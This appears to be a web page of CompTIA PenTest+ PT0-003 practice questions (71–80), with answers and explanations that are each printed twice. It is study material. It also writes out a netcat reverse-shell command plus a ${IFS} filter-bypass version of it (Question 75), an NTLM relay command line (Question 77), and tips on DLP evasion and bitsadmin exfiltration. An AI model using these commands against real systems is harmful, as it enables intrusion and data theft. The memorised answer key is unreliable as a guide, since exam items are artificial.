Practice Free PT0-003 Exam Online Questions
Question #71
Which of the following is the most likely LOLBin to be used to perform an exfiltration on a Microsoft Windows environment?
- A . procdump.exe
- B . msbuild.exe
- C . bitsadmin.exe
- D . cscript.exe
Correct Answer: C
C
Explanation:
In PenTest+ tradecraft, “living off the land binaries” (LOLbins) are legitimate, built-in Windows utilities that can be repurposed to blend in with normal administrative activity. For exfiltration, the key requirement is a native capability to transfer data out over common network channels without introducing obvious third-party tools. bitsadmin.exe (Background Intelligent Transfer Service administration) is widely associated with this because it can create and manage BITS jobs that upload or download files using HTTP/HTTPS in a way that often appears similar to routine Windows background traffic. This makes it a common choice for stealthy file movement and staged transfers during post-exploitation.
By comparison, procdump.exe is typically used for process memory dumping (often credential-related) rather than transporting files off-host. msbuild.exe is commonly abused for code execution via inline tasks or project files, not primarily for exfiltration. cscript.exe runs scripts (VBScript/JScript) and could be used to script many actions, but it is not as directly aligned with built-in, job-based network file transfer as bitsadmin. Therefore, bitsadmin.exe best fits the exfiltration objective.
C
Explanation:
In PenTest+ tradecraft, “living off the land binaries” (LOLbins) are legitimate, built-in Windows utilities that can be repurposed to blend in with normal administrative activity. For exfiltration, the key requirement is a native capability to transfer data out over common network channels without introducing obvious third-party tools. bitsadmin.exe (Background Intelligent Transfer Service administration) is widely associated with this because it can create and manage BITS jobs that upload or download files using HTTP/HTTPS in a way that often appears similar to routine Windows background traffic. This makes it a common choice for stealthy file movement and staged transfers during post-exploitation.
By comparison, procdump.exe is typically used for process memory dumping (often credential-related) rather than transporting files off-host. msbuild.exe is commonly abused for code execution via inline tasks or project files, not primarily for exfiltration. cscript.exe runs scripts (VBScript/JScript) and could be used to script many actions, but it is not as directly aligned with built-in, job-based network file transfer as bitsadmin. Therefore, bitsadmin.exe best fits the exfiltration objective.
Question #72
A penetration tester obtains the following output during an Nmap scan:
PORT STATE SERVICE
135/tcp open msrpc
445/tcp open microsoft-ds
1801/tcp open msmq
2103/tcp open msrpc
3389/tcp open ms-wbt-server
Which of the following should be the next step for the tester?
- A . Search for vulnerabilities on msrpc.
- B . Enumerate shares and search for vulnerabilities on the SMB service.
- C . Execute a brute-force attack against the Remote Desktop Services.
- D . Execute a new Nmap command to search for another port.
Correct Answer: B
B
Explanation:
The presence of SMB (port 445) and MSRPC (port 135) indicates potential Windows network services that could be vulnerable to misconfigurations or exploits.
Enumerate shares and search for vulnerabilities on SMB (Option B):
SMB (Server Message Block) allows file and printer sharing. Misconfigured or open shares could contain sensitive data.
Tools like enum4linux or smbclient can be used to list available shares and check for anonymous access.
SMB vulnerabilities (e.g., EternalBlue – CVE-2017-0144) can be exploited for remote code execution.
Reference: CompTIA PenTest+ PT0-003 Official Study Guide – "SMB Enumeration and Exploitation"
Incorrect options:
Option A (Search vulnerabilities on msrpc): MSRPC (Microsoft Remote Procedure Call) is not commonly exploited directly unless an SMB or RDP vulnerability is found.
Option C (Brute-force RDP): Brute-force attacks generate excessive failed login attempts, triggering security alerts.
Option D (Search for another port): The open ports already provide sufficient attack vectors.
B
Explanation:
The presence of SMB (port 445) and MSRPC (port 135) indicates potential Windows network services that could be vulnerable to misconfigurations or exploits.
Enumerate shares and search for vulnerabilities on SMB (Option B):
SMB (Server Message Block) allows file and printer sharing. Misconfigured or open shares could contain sensitive data.
Tools like enum4linux or smbclient can be used to list available shares and check for anonymous access.
SMB vulnerabilities (e.g., EternalBlue – CVE-2017-0144) can be exploited for remote code execution.
Reference: CompTIA PenTest+ PT0-003 Official Study Guide – "SMB Enumeration and Exploitation"
Incorrect options:
Option A (Search vulnerabilities on msrpc): MSRPC (Microsoft Remote Procedure Call) is not commonly exploited directly unless an SMB or RDP vulnerability is found.
Option C (Brute-force RDP): Brute-force attacks generate excessive failed login attempts, triggering security alerts.
Option D (Search for another port): The open ports already provide sufficient attack vectors.
Question #73
A penetration tester is getting ready to conduct a vulnerability scan to evaluate an environment that consists of a container orchestration cluster.
Which of the following tools would be best to use for this purpose?
- A . NSE
- B . Nessus
- C . CME
- D . Trivy
Correct Answer: D
D
Explanation:
In a container orchestration environment (for example, Kubernetes), the most valuable vulnerability scanning capability is one that understands container images, packages, and misconfigurations that commonly occur in containerized workloads. Trivy is specifically designed for container security assessment: it scans container images and the underlying OS/application dependencies for known vulnerabilities and can also identify misconfigurations relevant to cloud-native deployments. This aligns closely with PenTest+ guidance that testers should choose tools that match the technology stack being assessed―container ecosystems require image- and dependency-aware scanning rather than only traditional host/service scanning.
NSE (Nmap Scripting Engine) is excellent for network discovery and service enumeration, but it does not provide comprehensive container image vulnerability coverage. Nessus is a general-purpose vulnerability scanner and can be useful for hosts, but it is not as directly focused on container image supply chain issues and cluster workload artifacts as a dedicated container scanner. CrackMapExec (CME) is aimed at Windows/AD enumeration and lateral movement, not container vulnerability scanning. Therefore, Trivy is the best fit for scanning a container orchestration cluster environment.
D
Explanation:
In a container orchestration environment (for example, Kubernetes), the most valuable vulnerability scanning capability is one that understands container images, packages, and misconfigurations that commonly occur in containerized workloads. Trivy is specifically designed for container security assessment: it scans container images and the underlying OS/application dependencies for known vulnerabilities and can also identify misconfigurations relevant to cloud-native deployments. This aligns closely with PenTest+ guidance that testers should choose tools that match the technology stack being assessed―container ecosystems require image- and dependency-aware scanning rather than only traditional host/service scanning.
NSE (Nmap Scripting Engine) is excellent for network discovery and service enumeration, but it does not provide comprehensive container image vulnerability coverage. Nessus is a general-purpose vulnerability scanner and can be useful for hosts, but it is not as directly focused on container image supply chain issues and cluster workload artifacts as a dedicated container scanner. CrackMapExec (CME) is aimed at Windows/AD enumeration and lateral movement, not container vulnerability scanning. Therefore, Trivy is the best fit for scanning a container orchestration cluster environment.
Question #74
Which of the following techniques is the best way to avoid detection by data loss prevention tools?
- A . Encoding
- B . Compression
- C . Encryption
- D . Obfuscation
Correct Answer: A
A
Explanation:
Encoding to Evade DLP:
Encoding (e.g., Base64) transforms data into a format that may bypass data loss prevention (DLP) tools.
DLP solutions often look for specific patterns (e.g., sensitive keywords, file headers) and may not recognize encoded data.
Why Not Other Options?
B (Compression): Compression reduces file size but does not typically bypass DLP detection mechanisms.
C (Encryption): Encrypted data is detectable by DLP tools, though its contents may not be readable.
D (Obfuscation): While obfuscation hides intent, encoding is more effective for bypassing automated detection.
CompTIA Pentest+
Reference: Domain 3.0 (Attacks and Exploits)
A
Explanation:
Encoding to Evade DLP:
Encoding (e.g., Base64) transforms data into a format that may bypass data loss prevention (DLP) tools.
DLP solutions often look for specific patterns (e.g., sensitive keywords, file headers) and may not recognize encoded data.
Why Not Other Options?
B (Compression): Compression reduces file size but does not typically bypass DLP detection mechanisms.
C (Encryption): Encrypted data is detectable by DLP tools, though its contents may not be readable.
D (Obfuscation): While obfuscation hides intent, encoding is more effective for bypassing automated detection.
CompTIA Pentest+
Reference: Domain 3.0 (Attacks and Exploits)
Question #75
A penetration tester is trying to bypass a command injection blocklist to exploit a remote code execution vulnerability.
The tester uses the following command:
nc -e /bin/sh 10.10.10.16 4444
Which of the following would most likely bypass the filtered space character?
- A . ${IFS}
- B . %0a
- C . + *
- D . %20
Correct Answer: A
A
Explanation:
To bypass a command injection blocklist that filters out the space character, the tester can use ${IFS}. ${IFS} stands for Internal Field Separator in Unix-like systems, which by default is set to space, tab, and newline characters.
Command Injection:
Command injection vulnerabilities allow attackers to execute arbitrary commands on the host operating system via a vulnerable application.
Filters or blocklists are often implemented to prevent exploitation by disallowing certain characters like spaces.
Bypassing Filters:
${IFS}: Using ${IFS} instead of a space can bypass filters that block spaces. ${IFS} expands to a space character in shell commands.
Example: The command nc -e /bin/sh 10.10.10.16 4444 can be rewritten as nc${IFS}-e${IFS}/bin/sh${IFS}10.10.10.16${IFS}4444.
Alternative Encodings:
%0a: Represents a newline character in URL encoding.
+: Sometimes used in place of space in URLs.
%20: URL encoding for space.
However, ${IFS} is most appropriate for shell command contexts.
Pentest
Reference: Command Injection: Understanding how command injection works and common techniques to exploit it.
Bypassing Filters: Using creative methods like environment variable expansion to bypass input filters and execute commands.
Shell Scripting: Knowledge of shell scripting and environment variables is crucial for effective exploitation.
By using ${IFS}, the tester can bypass the filtered space character and execute the intended command, demonstrating the vulnerability’s exploitability.
A
Explanation:
To bypass a command injection blocklist that filters out the space character, the tester can use ${IFS}. ${IFS} stands for Internal Field Separator in Unix-like systems, which by default is set to space, tab, and newline characters.
Command Injection:
Command injection vulnerabilities allow attackers to execute arbitrary commands on the host operating system via a vulnerable application.
Filters or blocklists are often implemented to prevent exploitation by disallowing certain characters like spaces.
Bypassing Filters:
${IFS}: Using ${IFS} instead of a space can bypass filters that block spaces. ${IFS} expands to a space character in shell commands.
Example: The command nc -e /bin/sh 10.10.10.16 4444 can be rewritten as nc${IFS}-e${IFS}/bin/sh${IFS}10.10.10.16${IFS}4444.
Alternative Encodings:
%0a: Represents a newline character in URL encoding.
+: Sometimes used in place of space in URLs.
%20: URL encoding for space.
However, ${IFS} is most appropriate for shell command contexts.
Pentest
Reference: Command Injection: Understanding how command injection works and common techniques to exploit it.
Bypassing Filters: Using creative methods like environment variable expansion to bypass input filters and execute commands.
Shell Scripting: Knowledge of shell scripting and environment variables is crucial for effective exploitation.
By using ${IFS}, the tester can bypass the filtered space character and execute the intended command, demonstrating the vulnerability’s exploitability.
Question #76
A penetration tester identifies the URL for an internal administration application while following DevOps team members on their commutes.
Which of the following attacks did the penetration tester most likely use?
- A . Shoulder surfing
- B . Dumpster diving
- C . Spear phishing
- D . Tailgating
Correct Answer: A
A
Explanation:
La técnica utilizada en este escenario es Shoulder Surfing, que consiste en observar directamente a una persona mientras trabaja, con el objetivo de recopilar información sensible, como credenciales, direcciones URL internas u otros datos confidenciales.
En este caso, el pentester siguió a los miembros del equipo DevOps durante sus desplazamientos (commute) y logró identificar una URL interna. No se usó ingeniería social directa (como en spear phishing), ni acceso físico no autorizado (como en tailgating), ni revisión de basura (dumpster diving).
Referencia: PT0-003 Objective 2.1 – Explain the importance of physical security assessments.
Shoulder surfing is listed as a key social engineering technique.
A
Explanation:
La técnica utilizada en este escenario es Shoulder Surfing, que consiste en observar directamente a una persona mientras trabaja, con el objetivo de recopilar información sensible, como credenciales, direcciones URL internas u otros datos confidenciales.
En este caso, el pentester siguió a los miembros del equipo DevOps durante sus desplazamientos (commute) y logró identificar una URL interna. No se usó ingeniería social directa (como en spear phishing), ni acceso físico no autorizado (como en tailgating), ni revisión de basura (dumpster diving).
Referencia: PT0-003 Objective 2.1 – Explain the importance of physical security assessments.
Shoulder surfing is listed as a key social engineering technique.
Question #77
A tester obtains access to an endpoint subnet and wants to move laterally in the network.
Given the following Nmap scan output:
Nmap scan report for some_host
Host is up (0.01s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
smb2-security-mode: Message signing disabled
Which of the following command and attack methods is the most appropriate for reducing the chances of being detected?
- A . responder -I eth0 -dwv ntlmrelayx.py -smb2support -tf <target>
- B . msf > use exploit/windows/smb/ms17_010_psexec
- C . hydra -L administrator -P /path/to/passwdlist smb://<target>
- D . nmap –script smb-brute.nse -p 445 <target>
Correct Answer: A
A
Explanation:
The Nmap scan output indicates SMB (port 445) is open, and message signing is disabled. This makes the system vulnerable to NTLM relay attacks.
Option A (responder -I eth0 -dwv ntlmrelayx.py -smb2support -tf <target>) ✅ : Correct.
Responder poisons LLMNR and NBT-NS requests, capturing NTLM hashes.
NTLMRelayX then relays captured hashes to an SMB service without message signing, allowing unauthorized access.
This attack is stealthier than brute-force methods.
Option B (ms17_010_psexec) ❌ : This exploits EternalBlue, but we don’t have confirmation that this system is vulnerable to MS17-010.
Option C (hydra brute-force) ❌ : SMB brute-force is noisy and will likely trigger alerts.
Option D (smb-brute.nse) ❌ : This brute-force attack is also loud and detectable.
Reference: CompTIA PenTest+ PT0-003 Official Guide C NTLM Relay & SMB Exploitation
A
Explanation:
The Nmap scan output indicates SMB (port 445) is open, and message signing is disabled. This makes the system vulnerable to NTLM relay attacks.
Option A (responder -I eth0 -dwv ntlmrelayx.py -smb2support -tf <target>) ✅ : Correct.
Responder poisons LLMNR and NBT-NS requests, capturing NTLM hashes.
NTLMRelayX then relays captured hashes to an SMB service without message signing, allowing unauthorized access.
This attack is stealthier than brute-force methods.
Option B (ms17_010_psexec) ❌ : This exploits EternalBlue, but we don’t have confirmation that this system is vulnerable to MS17-010.
Option C (hydra brute-force) ❌ : SMB brute-force is noisy and will likely trigger alerts.
Option D (smb-brute.nse) ❌ : This brute-force attack is also loud and detectable.
Reference: CompTIA PenTest+ PT0-003 Official Guide C NTLM Relay & SMB Exploitation
Question #78
A penetration tester performs the following scan:
nmap -sU -p 53,161,162 192.168.1.51
PORT | STATE
53/udp | open|filtered
161/udp | open|filtered
162/udp | open|filtered
The tester then manually uses snmpwalk against port 161 and receives valid SNMP responses.
Which of the following best explains the scan result for port 161?
- A . The SNMP daemon delayed its response beyond Nmap’s UDP scan timeout.
- B . Nmap marked the port as open|filtered because no response was received.
- C . The scanned host applied rate limiting to its responses to prevent UDP fingerprinting.
- D . The Nmap scan lacked root privileges, which reduced packet inspection accuracy.
Correct Answer: B
B
Explanation:
In PenTest+ network enumeration, UDP scanning is emphasized as inherently less reliable than TCP because many UDP services do not respond unless they receive an application-valid request, and many firewalls silently drop unsolicited UDP probes. With Nmap -sU, if the scanner does not receive either (1) an application-layer UDP response indicating the service is listening or (2) an ICMP “port unreachable” message indicating the port is closed, Nmap cannot definitively classify the port. In that case, it reports open|filtered, meaning the port may be open but nonresponsive to the probe, or traffic may be filtered.
SNMP commonly requires a correct community string and properly formed requests before returning data. snmpwalk generates valid SNMP queries and can succeed even when Nmap’s generic probe yields no reply, resulting in an open|filtered label. Root privilege issues do not explain this state, and rate limiting is possible but not the best fit given the standard UDP classification behavior.
B
Explanation:
In PenTest+ network enumeration, UDP scanning is emphasized as inherently less reliable than TCP because many UDP services do not respond unless they receive an application-valid request, and many firewalls silently drop unsolicited UDP probes. With Nmap -sU, if the scanner does not receive either (1) an application-layer UDP response indicating the service is listening or (2) an ICMP “port unreachable” message indicating the port is closed, Nmap cannot definitively classify the port. In that case, it reports open|filtered, meaning the port may be open but nonresponsive to the probe, or traffic may be filtered.
SNMP commonly requires a correct community string and properly formed requests before returning data. snmpwalk generates valid SNMP queries and can succeed even when Nmap’s generic probe yields no reply, resulting in an open|filtered label. Root privilege issues do not explain this state, and rate limiting is possible but not the best fit given the standard UDP classification behavior.
Question #79
A penetration tester performs a service enumeration process and receives the following result after scanning a server using the Nmap tool:
bash
PORT STATE SERVICE
22/tcp open ssh
25/tcp filtered smtp
111/tcp open rpcbind
2049/tcp open nfs
Based on the output, which of the following services provides the best target for launching an attack?
- A . Database
- B . Remote access
- C . Email
- D . File sharing
Correct Answer: D
D
Explanation:
From the Nmap results:
Service Analysis:
SSH (22): Secure Shell is a remote access protocol that is typically well-secured with encryption and authentication mechanisms. It’s not the easiest to exploit without valid credentials or known vulnerabilities.
SMTP (25): The port is filtered, which indicates that it might be blocked by a firewall, making it less accessible as an attack vector.
RPCBind (111): RPC services can sometimes expose vulnerabilities, but they are less common in modern systems.
NFS (2049): Network File System is a file-sharing service. Misconfigured NFS servers often expose sensitive files or directories that can be accessed without proper authentication.
Best Target:NFS (port 2049) is the most attractive target. Attackers can exploit insecure exports, gain unauthorized access to shared directories, or elevate privileges if the server allows root access over NFS.
CompTIA Pentest+
Reference: Domain 2.0 (Information Gathering and Vulnerability Identification)
Domain 3.0 (Attacks and Exploits)
D
Explanation:
From the Nmap results:
Service Analysis:
SSH (22): Secure Shell is a remote access protocol that is typically well-secured with encryption and authentication mechanisms. It’s not the easiest to exploit without valid credentials or known vulnerabilities.
SMTP (25): The port is filtered, which indicates that it might be blocked by a firewall, making it less accessible as an attack vector.
RPCBind (111): RPC services can sometimes expose vulnerabilities, but they are less common in modern systems.
NFS (2049): Network File System is a file-sharing service. Misconfigured NFS servers often expose sensitive files or directories that can be accessed without proper authentication.
Best Target:NFS (port 2049) is the most attractive target. Attackers can exploit insecure exports, gain unauthorized access to shared directories, or elevate privileges if the server allows root access over NFS.
CompTIA Pentest+
Reference: Domain 2.0 (Information Gathering and Vulnerability Identification)
Domain 3.0 (Attacks and Exploits)
Question #80
A penetration tester wants to expand access into a network by enumerating users and credentials.
The tester runs some tools for enumeration and captures the following information:
[SMB] Client: 10.203.10.14
[SMB] Username: comptiaadmin
[SMB] Hash: 10.203.20.16:a96409231c099f17
Which of the following steps should the penetration tester take next?
- A . Use Hydra to brute-force passwords with the captured username.
- B . Utilize the auxiliary/server/http_ntlmrelay module in Metasploit.
- C . Perform a secretsdump with Impacket using the NTLM digest.
- D . Load the hash information into John the Ripper for cracking.
Correct Answer: D
D
Explanation:
The best next step is to load the captured hash into John the Ripper for offline cracking. The tester already has a username and associated hash material, so the most practical action is to attempt to recover the plaintext password. Offline cracking is efficient because it does not directly interact with the target authentication service, which reduces noise and avoids account lockout risks compared with brute-force attempts using Hydra. NTLM relay would require an active relay opportunity and is not the clearest next move from the information shown. secretsdump is generally used after valid credentials or appropriate hash material are available for remote extraction, and the snippet provided does not indicate sufficient privilege or a full credential set for that step. Therefore, cracking the captured hash is the most appropriate immediate action to expand access.
D
Explanation:
The best next step is to load the captured hash into John the Ripper for offline cracking. The tester already has a username and associated hash material, so the most practical action is to attempt to recover the plaintext password. Offline cracking is efficient because it does not directly interact with the target authentication service, which reduces noise and avoids account lockout risks compared with brute-force attempts using Hydra. NTLM relay would require an active relay opportunity and is not the clearest next move from the information shown. secretsdump is generally used after valid credentials or appropriate hash material are available for remote extraction, and the snippet provided does not indicate sufficient privilege or a full credential set for that step. Therefore, cracking the captured hash is the most appropriate immediate action to expand access.